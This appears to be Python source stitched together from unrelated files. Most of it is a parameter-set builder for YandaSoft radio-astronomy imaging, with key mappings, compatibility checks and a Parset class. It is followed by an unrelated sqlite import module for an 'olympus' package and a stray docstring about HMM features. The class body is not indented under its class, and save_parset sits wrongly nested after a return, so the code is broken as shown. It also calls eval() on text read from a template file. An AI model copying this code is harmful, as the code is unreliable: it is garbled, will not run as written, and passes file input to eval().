        'Galldatapsf': 'gridder.alldatapsf',
        'Goversampleweight': 'gridder.oversampleweight',
        'GMaxPointingSeparation': 'gridder.MaxPointingSeparation',
        'Gsnapshotimaging': 'gridder.snapshotimaging',
        'GSwtolerance': 'gridder.snapshotimaging.wtolerance',
        'GSclipping': 'gridder.snapshotimaging.clipping',
        'GSweightsclipping': 'gridder.snapshotimaging.weightsclipping',
        'GSreprojectpsf': 'gridder.snapshotimaging.reprojectpsf',
        'GScoorddecimation': 'gridder.snapshotimaging.coorddecimation',
        'GSinterpmethod': 'gridder.snapshotimaging.interpmethod',
        'GSlongtrack': 'gridder.snapshotimaging.longtrack',
        'Gbwsmearing': 'gridder.bwsmearing',
        'GBchanbw': 'gridder.bwsmearing.chanbw',
        'GBnsteps': 'gridder.bwsmearing.nsteps',
        'Gparotation': 'gridder.parotation',
        'GPangle': 'gridder.parotation.angle',
        'Gswappols': 'gridder.swappols',
        #Per-gridder parameters: the gridder name is baked into the key
        'GNwmax': 'gridder.{0:s}.wmax'.format(gridder_name),
        'GNwmaxclip': 'gridder.{0:s}.wmaxclip'.format(gridder_name),
        'GNnwplanes': 'gridder.{0:s}.nwplanes'.format(gridder_name),
        'GNwstats': 'gridder.{0:s}.wstats'.format(gridder_name),
        'GNalpha': 'gridder.{0:s}.alpha'.format(gridder_name),
        'GNwsampling': 'gridder.{0:s}.wsampling'.format(gridder_name),
        'GNWexponent': 'gridder.{0:s}.wsampling.exponent'.format(gridder_name),
        'GNWnwplanes50': 'gridder.{0:s}.wsampling.nwplanes50'.format(gridder_name),
        'GNWexport': 'gridder.{0:s}.wsampling.export'.format(gridder_name),
        'GNcutoff': 'gridder.{0:s}.cutoff'.format(gridder_name),
        'GNCabsolute': 'gridder.{0:s}.cutoff.absolute'.format(gridder_name),
        'GNoversample': 'gridder.{0:s}.oversample'.format(gridder_name),
        'GNmaxsupport': 'gridder.{0:s}.maxsupport'.format(gridder_name),
        'GNlimitsupport': 'gridder.{0:s}.limitsupport'.format(gridder_name),
        'GNvariablesupport': 'gridder.{0:s}.variablesupport'.format(gridder_name),
        'GNoffsetsupport': 'gridder.{0:s}.offsetsupport'.format(gridder_name),
        'GNtablename': 'gridder.{0:s}.tablename'.format(gridder_name),
        'GNusedouble': 'gridder.{0:s}.usedouble'.format(gridder_name),
        'GNsharecf': 'gridder.{0:s}.sharecf'.format(gridder_name),
        #Deconvolution solver
        'solver': 'solver',
        'Cverbose': 'solver.Clean.verbose',
        'Ctolerance': 'solver.Clean.tolerance',
        'Cweightcutoff': 'solver.Clean.weightcutoff',
        'Ccweightcutoff': 'solver.Clean.weightcutoff.clean',
        'Calgorithm': 'solver.Clean.algorithm',
        'Cscales': 'solver.Clean.scales',
        'Cniter': 'solver.Clean.niter',
        'Cgain': 'solver.Clean.gain',
        'Cbeam': 'solver.Clean.beam',
        'Cspeedup': 'solver.Clean.speedup',
        'Cpadding': 'solver.Clean.padding',
        'Csolutiontype': 'solver.Clean.solutiontype',
        'Clogevery': 'solver.Clean.logevery',
        'Csaveintermediate': 'solver.Clean.saveintermediate',
        'CBpsfwidth': 'solver.Clean.psfwidth',
        'CBdetectdivergence': 'solver.Clean.detectdivergence',
        'CBorthogonal': 'solver.Clean.orthogonal',
        'CBdecoupled': 'solver.Clean.decoupled',
        'Tminorcycle': 'threshold.minorcycle',
        'Tmajorcycle': 'threshold.majorcycle',
        'Tmasking': 'threshold.masking',
        #Preconditioning
        'PNames': 'preconditioner.Names',
        'Preservecf': 'preconditioner.preservecf',
        'PWnoisepower': 'preconditioner.Wiener.noisepower',
        'PWnormalise': 'preconditioner.Wiener.normalise',
        'PWrobustness': 'preconditioner.Wiener.robustness',
        'PWtaper': 'preconditioner.Wiener.taper',
        'PGaussianTaper': 'preconditioner.GaussianTaper',
        'PGTisPsfSize': 'preconditioner.GaussianTaper.isPsfSize',
        'PGTtolerance': 'preconditioner.GaussianTaper.tolerance',
        #Restoring cycles
        'Rbeam': 'restore.beam',
        'Rbeamcutoff': 'restore.beam.cutoff',
        'Requalise': 'restore.equalise',
        'Rupdateresiduals': 'restore.updateresiduals',
        'RbeamReference': 'restore.beamReference'
    }
    #The inversion assumes the mapping values are unique (they are by construction)
    inverse_parset_mapping = {v: k for k, v in parset_mapping.items()}
    return parset_mapping, inverse_parset_mapping
#Generate the mapping order:
# A dictionary defining the order in which the ``dstack`` parset parameters are
# written out to prompt or to file.
log.debug('Create _MAPPING_ORDER global variable')
# Each key maps to its (index, key) pair so the values sort by insertion
# position of the canonical mapping (Python 3.7+ dicts preserve order).
# NOTE: the (index, key) tuple value shape is kept for backward compatibility;
# the mapping is now built with a single call to create_parset_mapping()
# instead of the former double invocation.
_MAPPING_ORDER = {k: (i, k) for i, k in enumerate(create_parset_mapping()[0])}
#Define ambiguous imaging parameters: short ``Images.x`` form -> per-image ``Images.name.x`` form
_AMBIGOUS_IMAGING_PARAMETERS = {'Ishape': 'INshape',
                                'Idirection': 'INdirection',
                                'Icellsize': 'INcellsize'}
def check_preconditioner_suppoort(preconditioners=_DEFAULT_PRECONDITIONER):
    """Check if the list of preconditioners given is supported.
    (The misspelled public name is kept for backward compatibility with callers.)
    Parameters
    ==========
    preconditioners: list
        A list containing the preconditioners to test
    Returns
    =======
    allowed: bool
        True if the given list contains only allowed preconditioners
        (an empty list counts as allowed, i.e. no preconditioning), False otherwise
    """
    #all() over an empty iterable is True, which covers the "no preconditioning"
    #case without a separate branch
    return all(p in _SUPPORTED_PRECONDITIONERS for p in preconditioners)
def check_parameter_and_Imager_compatibility(parset_param, imager=_DEFAULT_IMAGER):
    """Decide whether a ``dstack`` parset parameter may be used with the given imager.
    Only called when a parset is written to disc; the in-memory parset is allowed
    to hold incompatible parameters for the sake of flexibility.
    Parameters
    ==========
    parset_param: str
        The ``dstack`` parset parameter variable name
    imager: str, optional
        Imager to test against
    Returns
    =======
    Compatibility: bool
        True if the parameter is allowed with the given imager, False if not
    Raises
    ======
    TypeError
        If ``imager`` is not a supported imager
    """
    if imager not in _SUPPORTED_IMAGERS:
        raise TypeError('Imager {0:s} is not supported!'.format(imager))
    #Parameters each imager refuses; the special 'dstack' imager accepts
    #everything and therefore has no entry here
    incompatible = {
        'Cimager': ('grid', 'psfgrid', 'pcf'),
        'Cdeconvolver': ('dataset',),
    }
    return parset_param not in incompatible.get(imager, ())
def check_parameter_and_Preconditioner_compatibility(parset_param, preconditioners=_DEFAULT_PRECONDITIONER):
    """Decide whether a ``dstack`` parset parameter may be used with the chosen preconditioner(s).
    Only called when a parset is written to disc; the in-memory parset is allowed
    to hold incompatible parameters for the sake of flexibility.
    Parameters
    ==========
    parset_param: str
        The ``dstack`` parset parameter variable name
    preconditioners: list, optional
        This is the list of preconditioners used
    Returns
    =======
    Compatibility: bool
        True if the parameter is allowed with the given preconditioner(s), False if not
    Raises
    ======
    TypeError
        If ``preconditioners`` contains an unsupported preconditioner
    """
    #Validate up front: the original implementation only reached this check when
    #both supported preconditioners were selected, so unsupported entries could
    #slip through the other branches silently.
    if not check_preconditioner_suppoort(preconditioners):
        raise TypeError('The preconditioner given is not supported!')
    if preconditioners == []:
        #The Preservecf parameter would be allowed due to the mysterious ways YandaSoft works...
        #However, no preconditioning-related parameters are allowed in this case,
        #as this solution allows to make Cdeconvolver run with the no-preconditioning
        #option by default if the preconditioner is set to []
        return parset_param not in (_FORBIDDEN_WITH_NO_PRECONDITIONING
                                    + _WIENER_FORBIDDEN_PARAMS
                                    + _GAUSSIANTAPER_FORBIDDEN_PARAMS)
    #Wiener-only parameters are forbidden when Wiener is not selected, and
    #GaussianTaper-only parameters when GaussianTaper is not selected
    if 'Wiener' not in preconditioners and parset_param in _WIENER_FORBIDDEN_PARAMS:
        return False
    if 'GaussianTaper' not in preconditioners and parset_param in _GAUSSIANTAPER_FORBIDDEN_PARAMS:
        return False
    return True
def check_parameter_and_Gridder_compatibility(parset_param, gridder_name=_DEFAULT_GRIDDER_NAME):
    """Decide whether a ``dstack`` parset parameter may be used with the given gridder.
    Only called when a parset is written to disc; the in-memory parset is allowed
    to hold incompatible parameters for the sake of flexibility.
    Parameters
    ==========
    parset_param: str
        The ``dstack`` parset parameter variable name
    gridder_name: str, optional
        This is the name of the gridder used
    Returns
    =======
    Compatibility: bool
        True if the parameter is allowed with the given gridder, False if not
    Raises
    ======
    TypeError
        If ``gridder_name`` is not a supported gridder
    """
    #Validate first -- in the original code the support check sat after the
    #per-gridder branches and was unreachable for the known gridder names.
    if gridder_name not in _SUPPORTED_GRIDDER_NAMES:
        raise TypeError('The gridder given is not supported!')
    #Box is neither w-aware nor anti-aliasing; SphFunc is anti-aliasing only;
    #WStack is w-aware only; WProject (and any other supported gridder)
    #accepts everything.
    if gridder_name == 'Box':
        forbidden = _COPLANAR_FORBIDDEN_PARAMS + _NON_ANTIALIASING_FORBIDDEN_PARAMS
    elif gridder_name == 'SphFunc':
        forbidden = _COPLANAR_FORBIDDEN_PARAMS
    elif gridder_name == 'WStack':
        forbidden = _NON_ANTIALIASING_FORBIDDEN_PARAMS
    else:
        forbidden = []
    return parset_param not in forbidden
#=== CLASSES ===
class Parset(object):
"""Creates an in-memory dictionary of a ``YandaSoft`` parameterset.
It can be initialized as an empty dictionary and then the user can define
*every* parameter. Or a template parset can be used to initialize the
imaging parameters. To build different imaging parsets for pipelines,
the variation of the two methods is advised.
The template parset has to have each parameter in a new line starting with
the ``YandaSoft`` parameter e.g. ``Cimgaer.dataset``, which obviously starts
with the imager name. See the list of imagers supported in ``create_parset_mapping()``
The parameters value is the string after = and a backspace until the end of the line.
Lines starting with ``#`` are skipped.
The mapping between ``dstack`` and ``YandaSoft`` variables is defined by
the dictionary created with ``create_parset_mapping`.
The mapping is an attribute of the ``Parset`` class.
The mapping is based on the ``ASKAPSOFT`` `documentation <https://www.atnf.csiro.au/computing/software/askapsoft/sdp/docs/current/calim/index.html>`_
Though the ``Parset`` class offers a range of flexibility, currently the template parset
have to consist only one Images Names and gridder. These must be specified when creating
a ``Parset`` object and the template have to use the given naming convention in order to
be compatible with the mapping generated.
If no template is given, an empty parset is generated.
Keyword Arguments
=================
imager: str
Have to be a selected ``YandaSoft`` Imager task. When a parset file is created
this attribute is used to define the imager
image_names: str
The ``Names`` parameter of the parset. The template parset has to have this ``Names``
parameters (if used), when read in. Nevertheless, this can be changed on the fly, and
parsets with different names can be created. Use the ``update_parset_mapping()`` function
for this.
gridder_name: str
The ``gridder`` parameter of ``YandaSoft`` imager task.
template_path: str or None, optional
Full path to a template parset file, which can be used to
initialize the parset parameters
preconditioner: list or None, optional
The preconditioner(s) used when saving the parset. The ``Parset`` object is designed to be
flexible, allowing for parameters coexist even if it would make no sense. However, when
saving a Parset, a series of check ensures that the parset is compatible with ``YandaSoft``.
The solution for preconditioning is that the user can define which preconditioner to use
when saving a parset. This argument enable the user to define what preconditioners to use
when saving the parset. If set to None, the preconditioners are read from the template if given.
It creates an empty list if no template is given or if the template defines no preconditioning.
Note, that if the template uses preconditioning not supported by ``dstack``, it will be ignored.
"""
def __init__(self, imager=_DEFAULT_IMAGER, image_names=_DEFAULT_IMAGE_NAMES, gridder_name=_DEFAULT_GRIDDER_NAME, template_path=None, preconditioner=None):
    """Initialise the Parset, optionally populating it from a template parset file.
    See the class docstring for the meaning of the keyword arguments.
    """
    log.debug('Initialize new Parset object:')
    #Bypass the overridden __setattr__ so '_parset' becomes a real attribute
    object.__setattr__(self, "_parset", {})
    if imager not in _SUPPORTED_IMAGERS:
        raise TypeError('Imager {0:s} is not supported!'.format(imager))
    if gridder_name not in _SUPPORTED_GRIDDER_NAMES:
        raise TypeError('Gridder {0:s} is not supported!'.format(gridder_name))
    #These names are routed to object.__setattr__ by the overridden __setattr__
    self._imager = imager
    self._image_names = image_names
    self._gridder_name = gridder_name
    #Set up an empty list for ._preconditioner => it is filled with the preconditioner(s) from the template file
    if preconditioner != None:
        if check_preconditioner_suppoort(preconditioner) == False:
            raise TypeError('The preconditioner given is not allowed!')
        else:
            user_defined_preconditioner = True
    else:
        user_defined_preconditioner = False
    self._preconditioner = []
    pm, ipm = create_parset_mapping(image_names=self._image_names,gridder_name=self._gridder_name)
    object.__setattr__(self,"_mapping", pm)
    object.__setattr__(self,"_inverse_mapping", ipm)
    if template_path != None:
        if os.path.exists(template_path) == False:
            raise NameError('Template parset does not exist: {0:s}'.format(template_path))
        log.info('Create Parset based on template: {0:s}'.format(template_path))
        with open(template_path, 'r') as f:
            log.debug('Reading in template Parset file: {0:s}'.format(template_path))
            for line in f.readlines():
                #Skip comment lines and blank lines
                if line[0] == '#' or line.split() == []:
                    continue
                name = line.split()[0]
                #Check if the name starts with a string from the list of supported imagers
                if list(filter(name.startswith, _SUPPORTED_IMAGERS)) != []:
                    name = '.'.join(name.split('.')[1:])#Name without imager
                    value = line[line.index('= ')+2:].rstrip()#get rid of line separators with .rstrip()
                    if name not in self._inverse_mapping:
                        raise TypeError('Can not interpret the parameter {0:s} given in the parset {1:s}!'.format(
                            name,template_path))
                    #Some consistency checks against the attributes this object was created with
                    if self._inverse_mapping[name] == 'INames':
                        if self._image_names not in value:
                            raise NameError('Parsed created with different image names ({0:s}) from that defined in the template parset {1:s}!'.format(
                                self._image_names,template_path))
                    if self._inverse_mapping[name] == 'gridder':
                        if self._gridder_name not in value:
                            raise NameError('Parsed created with different gridder name ({0:s}) from that defined in the template parset {1:s}!'.format(
                                self._gridder_name,template_path))
                    if self._inverse_mapping[name] == 'solver':
                        if value not in _SUPPORTED_SOLVERS:
                            raise NameError('The solver defined in the template {0:s} is not supported!'.format(template_path))
                    if self._inverse_mapping[name] == 'PNames':
                        #The preconditioner list is parsed by substring matching against the supported names
                        valid_preconditioner = False
                        if ''.join(value.split()) == '[]':
                            valid_preconditioner = True
                        else:
                            for p in _SUPPORTED_PRECONDITIONERS:
                                if p in value:
                                    valid_preconditioner = True
                                    #Add the preconditioner to the list
                                    self.add_preconditioner(p)
                        if valid_preconditioner == False:
                            raise NameError('The preconditioner defined in the template {0:s} is not supported!'.format(
                                template_path))
                        #PNames stores the live ._preconditioner list object, not the raw template string
                        self._parset[self._inverse_mapping[name]] = self._preconditioner
                        continue
                    self._parset[self._inverse_mapping[name]] = value
                    log.debug('Parset parameter added: {0:s} = {1:s}'.format(self._inverse_mapping[name],value))
                else:
                    #NOTE(review): the format string has two placeholders but three
                    #arguments; the trailing template_path argument is silently ignored
                    log.warning('Invalid parset parameter: {0:s} as the imager used is {1:s}! (parameter skipped)'.format(
                        name,self._imager,template_path))
        #Set up the PNames key in ._parset as it always has to exist in order to save the Parset with correct preconditioning settings!
        if 'PNames' not in self._parset.keys():
            self._parset['PNames'] = []
        elif isinstance(self._parset['PNames'],list) == False:
            #NOTE(review): eval() on template text -- only use trusted template parsets
            self._parset['PNames'] = eval(self._parset['PNames']) #Evaluate string input as a list
        #Now overwrite the ._preconditioner attribute with the preconditioner defined by the user if given
        if user_defined_preconditioner == True:
            del self._preconditioner
            self._preconditioner = preconditioner
        #Order params according to mapping!
        self.sort_parset()
        log.info('Parset attributes: imager = {0:s}; image_names = {1:s}; gridder_name = {2:s}; preconditioner = {3:s}'.format(
            self._imager, self._image_names, self._gridder_name, str(self._preconditioner)))
    else:
        self._parset[self._inverse_mapping[self._mapping['INames']]] = self._image_names
        self._parset[self._inverse_mapping[self._mapping['gridder']]] = self._gridder_name
        log.info('Create Parset without template parset and parameters: Inames = {0:s}; gridder = {1:s}'.format(
            self._image_names,self._gridder_name))
        log.info('Parset attributes: imager = {0:s}; image_names = {1:s}; gridder_name = {2:s}; preconditioner = {3:s}'.format(
            self._imager, self._image_names, self._gridder_name, str(self._preconditioner)))
def add_parset_parameter(self,name,value):
    """Add (or overwrite) a parameter in the ``_parset`` attribute.
    This is the preferred way of adding parameters to the parset.
    Parameters
    ==========
    name: str
        Name of the parameter; must be one of the ``self._mapping`` keys,
        otherwise the parameter is skipped with an INFO log message.
    value: str (or almost anything)
        The value of the parameter; converted to a string when the
        ``Parset`` is saved.
    Returns
    =======
    :obj:`Parset`
        With ``name``/``value`` stored in the ``_parset`` dict
    """
    if name in self._mapping:
        log.debug('Add parset parameter: {0:s}'.format(name))
        #Round-trip through the mapping and its inverse keeps the stored key
        #consistent with the canonical mapping
        self._parset[self._inverse_mapping[self._mapping[name]]] = value
    else:
        log.info('Skip adding invalid parset paremater: {0:s}'.format(name))
def remove_parset_parameter(self,name):
    """Remove a parameter from the ``_parset`` attribute.
    This is the preferred way of removing parameters; unknown names and
    names not currently present are logged and otherwise ignored.
    Parameters
    ==========
    name: str
        Name of the parameter; must be one of the ``self._mapping`` keys.
    Returns
    =======
    :obj:`Parset`
        With the element called ``name`` removed from ``_parset``
    """
    if name in self._mapping:
        #EAFP: attempt the deletion and handle the missing-key case
        try:
            del self._parset[name]
            log.debug('Parameter removed from parset: {0:s}'.format(name))
        except KeyError:
            log.info('Parset do not contain parameter: {0:s}'.format(name))
    else:
        log.info('Can not remove invalid parset parameter: {0:s}'.format(name))
def __setattr__(self, name, value):
    """Route attribute assignment.
    The handful of real instance attributes are set directly; any other
    assignment is treated as a parset parameter and forwarded to
    ``add_parset_parameter()``.
    Parameters
    ==========
    name: str
        Attribute name, or a parset parameter name from ``self._mapping``.
    value: str (or almost anything)
        The value to store.
    Returns
    =======
    :obj:`Parset`
        With the attribute set or the ``_parset`` dict updated
    """
    internal_attributes = ('_parset', '_imager', '_image_names', '_gridder_name',
                           '_preconditioner', '_mapping', '_inverse_mapping')
    if name not in internal_attributes:
        self.add_parset_parameter(name, value)
    else:
        object.__setattr__(self, name, value)
def __repr__(self):
    """Return the Parset as a line-by-line string of attributes, keys and values."""
    #Sorting first keeps the printed order canonical (at some runtime cost)
    self.sort_parset()
    header = ['Imager: {0:s}'.format(self._imager),
              'Image Names: {0:s}'.format(self._image_names),
              'Preconditioner: {}'.format(self._preconditioner),
              'Parset parameters:',
              '{']
    body = ['\t{} = {}'.format(key, value) for key, value in self._parset.items()]
    return '\n'.join(header + body + ['}'])
def set_image_names_param_consistency(self,param,use_image_names=False):
    """Resolve ambiguous ``Images`` parameters to a single source of truth.
    Some image parameters can be given in two equivalent forms:
    a) ``Images.parameter``
    b) ``Images.image_name.parameter``
    The ``Parset`` class lets the user define both, for flexibility, but a
    saved parset must be consistent. Given ``param``, this returns the key
    whose value should be written out for both forms. If ``param`` is not
    ambiguous, or only one form is present, or the two forms agree, ``param``
    itself is returned. The ``_AMBIGOUS_IMAGING_PARAMETERS`` dictionary
    defines which parameters are ambiguous.
    NOTE(review): when the two forms disagree, ``use_image_names=True``
    selects the ``Images.image_name.parameter`` key in both branches, which
    appears inverted w.r.t. the original docstring -- behaviour preserved,
    worth confirming against callers.
    Parameters
    ==========
    param: str
        The parameter name in the mapping whose ambiguity should be checked.
    use_image_names: bool
        Selects which form wins when the two stored values disagree.
    Returns
    =======
    disambigous_param: str
        The mapping key whose value should be used; may equal ``param``.
    """
    if param in _AMBIGOUS_IMAGING_PARAMETERS.keys():
        #``param`` is the short ``Images.parameter`` form
        long_form = _AMBIGOUS_IMAGING_PARAMETERS[param]
        if long_form not in self._parset.keys():
            return param
        if self._parset[long_form] == self._parset[param]:
            return param
        return long_form if use_image_names else param
    if param in _AMBIGOUS_IMAGING_PARAMETERS.values():
        #``param`` is the per-image ``Images.image_name.parameter`` form
        inverse_ambigous_mapping = {v: k for k, v in _AMBIGOUS_IMAGING_PARAMETERS.items()}
        short_form = inverse_ambigous_mapping[param]
        if short_form not in self._parset.keys():
            return param
        if self._parset[short_form] == self._parset[param]:
            return param
        return param if use_image_names else short_form
    #Not ambiguous at all
    return param
def check_if_parset_sorted(self):
    """Check if the ._parset dictionary is sorted by the global _MAPPING_ORDER.
    An empty parset counts as sorted; the previous implementation raised
    ``IndexError`` when ._parset was empty.
    Parameters
    ==========
    Returns
    =======
    sorted: bool
        True if the ._parset dictionary is sorted, False if not
    """
    order = [_MAPPING_ORDER[k] for k in self._parset.keys()]
    #Pairwise monotonicity check; vacuously True for empty or single-key parsets
    return all(earlier <= later for earlier, later in zip(order, order[1:]))
def sort_parset(self):
    """Sort the ._parset dictionary into the canonical _MAPPING_ORDER order.
    A crucial step when saving parsets: it guarantees the parameters are
    written out in a logical order. No-op when already sorted.
    Parameters
    ==========
    Returns
    =======
    :obj:`Parset`
        With the ._parset dictionary rebuilt in sorted order if needed.
        Note that the ._parset attribute is replaced within this function!
    """
    if self.check_if_parset_sorted():
        log.debug('Parset parameters are already sorted!')
        return
    log.debug('Sort parset parameters.')
    #Sort directly by the global order index: O(n log n), replacing the
    #former list.index()-based key which made the sort O(n^2)
    ordered_items = sorted(self._parset.items(), key=lambda pair: _MAPPING_ORDER[pair[0]])
    #Rebuild the dict so its insertion (== iteration) order is the sorted order;
    #bypass the overridden __setattr__ as in __init__
    object.__setattr__(self, "_parset", dict(ordered_items))
def update_parset_mapping(self, image_names=_DEFAULT_IMAGE_NAMES, gridder_name=_DEFAULT_GRIDDER_NAME):
    """Rebuild the mapping between the ``dstack`` and ``YandaSoft`` parset variables.
    Also refreshes the stored ``INames`` and ``gridder`` parameters, so this is
    the function to use when changing the attributes affecting the mapping --
    it keeps everything consistent. The preconditioner is untouched, as all
    supported preconditioners are part of the default mapping. Note that the
    global ordering (``_MAPPING_ORDER``) is not updated.
    Parameters
    ==========
    image_names: str, optional
        The ``Names`` parameter of the parset.
    gridder_name: str, optional
        The ``gridder`` parameter of ``YandaSoft`` imager task.
    Returns
    =======
    :obj:`Parset`
        With updated mapping and associated attributes
    """
    log.info('Update Parset mapping using image_names = {0:s} and gridder = {1:s}'.format(image_names,gridder_name))
    self._image_names = image_names
    self._gridder_name = gridder_name
    new_mapping, new_inverse_mapping = create_parset_mapping(image_names=self._image_names,
                                                             gridder_name=self._gridder_name)
    self._mapping = new_mapping
    self._inverse_mapping = new_inverse_mapping
    #Keep the stored INames and gridder values in ._parset consistent
    self._parset['INames'] = str([self._image_names])
    self._parset['gridder'] = str(self._gridder_name)
def update_image_names(self, image_names=_DEFAULT_IMAGE_NAMES):
    """Change only the ``INames`` parameter (and hence the mapping).
    Thin convenience wrapper around ``update_parset_mapping()`` that keeps
    the current gridder untouched.
    Parameters
    ==========
    image_names: str, optional
        The ``Names`` parameter of the parset.
    Returns
    =======
    :obj:`Parset`
        With updated INames and mapping attributes
    """
    self.update_parset_mapping(image_names, self._gridder_name)
def update_gridder(self, gridder_name=_DEFAULT_GRIDDER_NAME):
    """Change only the gridder parameter (and hence the mapping).
    Thin convenience wrapper around ``update_parset_mapping()`` that keeps
    the current image names untouched.
    Parameters
    ==========
    gridder_name: str, optional
        The ``gridder`` parameter of ``YandaSoft`` imager task.
    Returns
    =======
    :obj:`Parset`
        With updated gridder and mapping attributes
    """
    self.update_parset_mapping(self._image_names, gridder_name)
def update_imager(self, imager):
    """Go-to routine when updating the imager.
    Parameters
    ==========
    imager: str
        Has to be a supported ``YandaSoft`` imager task; used when a
        parset file is created.
    Returns
    =======
    :obj:`Parset`
        With updated imager attribute
    Raises
    ======
    NameError
        If ``imager`` is not supported
    """
    if imager in _SUPPORTED_IMAGERS:
        log.info('Update Parset imager to {0:s}'.format(imager))
        self._imager = imager
    else:
        raise NameError('Imager {0:s} is not supported!'.format(imager))
def add_preconditioner(self,preconditioner):
    """Append a preconditioner to the ``_preconditioner`` attribute.
    Adding a preconditioner that is already present is a silent no-op,
    so the list never holds duplicates.
    Parameters
    ==========
    preconditioner: str
        A valid (supported) preconditioner, inspected when saving a parset.
    Returns
    =======
    :obj:`Parset`
        With the extra preconditioner in the _preconditioner attribute
    Raises
    ======
    NameError
        If the preconditioner is not supported
    """
    if preconditioner not in _SUPPORTED_PRECONDITIONERS:
        raise NameError('Preconditioner {0:s} is not supported!'.format(preconditioner))
    if preconditioner in self._preconditioner:
        return
    log.info("Preconditioner '{0:s}' added to Parset preconditioners".format(preconditioner))
    self._preconditioner.append(preconditioner)
def remove_preconditioner(self,preconditioner):
    """Remove a preconditioner from the ``_preconditioner`` list attribute.
    Removing a preconditioner that is not in the list is a silent no-op.
    Parameters
    ==========
    preconditioner: str
        A valid (supported) preconditioner, inspected when saving a parset.
    Returns
    =======
    :obj:`Parset`
        Without the removed preconditioner in the _preconditioner attribute
    Raises
    ======
    NameError
        If the preconditioner is not supported
    """
    if preconditioner not in _SUPPORTED_PRECONDITIONERS:
        raise NameError('Preconditioner {0:s} is not supported!'.format(preconditioner))
    if preconditioner in self._preconditioner:
        log.info("Preconditioner '{0:s}' removed from Parset preconditioners".format(preconditioner))
        self._preconditioner.remove(preconditioner)
def update_preconditioner(self,preconditioners):
    """Replace the ``_preconditioner`` list attribute wholesale.
    An empty list is allowed and means no preconditioning.
    Parameters
    ==========
    preconditioners: list
        List of valid (supported) preconditioners to use as the new list.
    Returns
    =======
    :obj:`Parset`
        With updated _preconditioner attribute
    Raises
    ======
    NameError
        If any of the given preconditioners is not supported
    """
    #Validate every entry before touching the attribute
    if preconditioners != []:
        for candidate in preconditioners:
            if candidate not in _SUPPORTED_PRECONDITIONERS:
                raise NameError('Preconditioner {0:s} is not supported!'.format(candidate))
    log.info('Update preconditioner to: {0:s}'.format(str(preconditioners)))
    self._preconditioner = preconditioners
def special_setup_for_saving_parsets(self):
    """Apply special-case fixes required by ``YandaSoft`` before saving.
    The ``Parset`` class is deliberately permissive, while ``YandaSoft``
    has some tricky restrictions; this is the last step run when a parset
    is written to file. Currently one special case is handled:
    - When the WProject gridder is used together with Wiener filtering,
      ``Preservecf`` has to be True so the PCF is computed. This matters
      especially when ``dumpgrids`` is set, as only then is the correct
      PCF dumped.
    Parameters
    ==========
    Returns
    =======
    :obj:`Parset`
        With updated attributes so ``YandaSoft`` returns the expected results
    """
    wiener_with_wproject = (self._gridder_name == 'WProject'
                            and 'Wiener' in self._preconditioner)
    #Treat a missing Preservecf entry the same as the string 'False'
    if wiener_with_wproject and self._parset.get('Preservecf', 'False') == 'False':
        self.add_parset_parameter('Preservecf','True')
    return True
    def save_parset(self, output_path, parset_name, overwrite=True, use_image_names=False):
        """Save the in-memory ``Parset`` to ``output_path/parset_name``.
        The saved parset can be fed into ``YandaSoft``
        Parameters
        ==========
        output_path: str
            Full path to the folder in which the parset will be saved.
        parset_name: str
            Name of the parset file created.
        overwrite: bool, optional
            If True, then the parset will be overwritten if existed.
        use_image_names: bool, optional
            The parameter with the same name defined in ``set_image_names_param_consistency()``.
            Basically how to handle ambiguous naming in the Images. parameters
        Returns
        ========
        Parset file: Parset file readable by ``YandaSoft``
            Create the parset file at ``output_path/parset_name``
        """
        parset_path = os.path.join(output_path, parset_name)
        if os.path.isdir(parset_path) and overwrite == False:
            raise TypeError('Parset file already exist, and the overwrite parameters is set to False!')
        log.debug('Save Parset parameters to: {0:s}'.format(parset_path))
        #Sort the parset
        self.sort_parset()
        log.info('Save parset as: {0:s}'.format(parset_path))
        #Check some special considerations (e.g. WProject + Wiener requires Preservecf)
        self.special_setup_for_saving_parsets()
        with open(parset_path, 'w') as f:
            # Only parameters compatible with the selected imager are written
            for key in self._parset.keys():
                if check_parameter_and_Imager_compatibility(key, imager=self._imager):
                    #Check preconditioning and use the ._preconditioner attribute instead of the ._param['PNames'] attribute!
                    if key == 'PNames':
                        # With no preconditioners selected the PNames line is written commented out ('#' prefix)
                        if self._preconditioner == []:
                            print('#{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping[key],str(self._preconditioner)),file=f)
                        else:
                            print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping[key],str(self._preconditioner)),file=f)
                    elif key in list(_AMBIGOUS_IMAGING_PARAMETERS.keys()) + list(_AMBIGOUS_IMAGING_PARAMETERS.values()):
                        print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping[key],
                            str(self._parset[self.set_image_names_param_consistency(key,use_image_names=use_image_names)])),#Use the default imager names parameter for disambiguity
                            file=f)
                    elif check_parameter_and_Preconditioner_compatibility(key, preconditioners=self._preconditioner):
                        #We know that preconditioner and gridder settings are independent!
                        if check_parameter_and_Gridder_compatibility(key, gridder_name=self._gridder_name):
                            print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping[key],str(self._parset[key])),file=f)
                        else:
                            continue
        #A special case, I added in order to secure the pcf output if the dumpgrid option is used
        #This is tested in the testing module!
        if self._preconditioner == [] and self._imager == 'Cimager' and 'dumpgrids' in self._parset.keys():
            log.info('The dumpgrids option is set to {0:s}, but no preconditioning is selected!'.format(str(self._parset['dumpgrids'])))
            log.info('This special case is handeled by adding preconditioner=[] and preservecf=True, which results in a pcf output!')
            # Append the extra lines after the main parset body has been written
            with open(parset_path, 'a') as f:
                print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping['PNames'],str(self._preconditioner)),file=f)
                print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping['Preservecf'],'true'),file=f)
# Library module: nothing to execute when run directly.
if __name__ == "__main__":
    pass
|
#!/usr/bin/env python
#==============================================================================
import traceback
from olympus import Logger
#==============================================================================
try:
import sqlalchemy
except ModuleNotFoundError:
error = traceback.format_exc()
for line in error.split('\n'):
if 'ModuleNotFoundError' in line:
module = line.strip().strip("'").split("'")[-1]
message = '''Sqlite databases require {module}, which could not be found.
Please install {module} or use a different database backend'''.format(module = module)
Logger.log(message, 'WARNING', only_once=True)
raise ModuleNotFoundError
#==============================================================================
from olympus.databases.database_sqlite.sqlite_operations import AddEntry, UpdateEntries, FetchEntries
from olympus.databases.database_sqlite.sqlite_interface import SqliteInterface
from olympus.databases.database_sqlite.wrapper_sqlite import Wrapper_sqlite
|
"""
The experiment combines the Fourier features and the features extracted from an HMM generative model.
After this augmented dataset is created we train and evaluate a Random Forest on it.
